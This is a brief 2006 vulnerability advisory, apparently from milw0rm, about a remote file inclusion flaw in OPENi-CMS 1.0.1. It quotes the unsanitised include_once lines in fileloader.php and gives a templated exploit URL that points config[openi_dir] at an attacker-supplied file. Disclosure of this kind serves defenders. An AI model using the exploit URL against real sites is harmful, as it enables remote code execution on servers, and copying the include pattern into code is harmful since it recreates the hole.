43 lines
No EOL
1.1 KiB
Text
43 lines
No EOL
1.1 KiB
Text
Update:
|
|
22:44 09/11/06
|
|
|
|
Subject:
|
|
"OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability "
|
|
|
|
Vulnerable version:
|
|
OPENi-CMS 1.0.1
|
|
|
|
Operating System:
|
|
- All OS
|
|
|
|
Vendor URL:
|
|
Support - support@openi-cms.org
|
|
Website - http://www.openi-cms.org/
|
|
|
|
Description:
|
|
Openi-CMS he one software PHP Content Management System with facilities
|
|
wysiwyg the editor, plugin, user management to facilitate arranged as
|
|
well as the difference style website
|
|
|
|
|
|
Vulnerability:
|
|
Invalid include function at fileloader.php on line at 5,6 and 7,the
|
|
'$config["openi_dir"]' is not gurantee to including a files.
|
|
|
|
// openi-admin/base/fileloader.php
|
|
|
|
include_once($config["openi_dir"]."/base/constants.php"); // invalid code
|
|
include_once($config["openi_dir"]."/base/db_classes.php"); // invalid code
|
|
include_once($config["openi_dir"]."/base/site_classes.php"); // invalid code
|
|
|
|
Exploit:
|
|
http://[url]/[path]/openi-admin/base/fileloader.php?config[openi_dir]=[url_inclusion_exploit]
|
|
|
|
Solution:
|
|
upgrade next version
|
|
|
|
Published by:
|
|
basher13 (Infam0us Gr0up - Securiti Research)
|
|
basher13@linuxmail.org / www.xcrime-cyber.pro.tc
|
|
|
|
# milw0rm.com [2006-09-11] |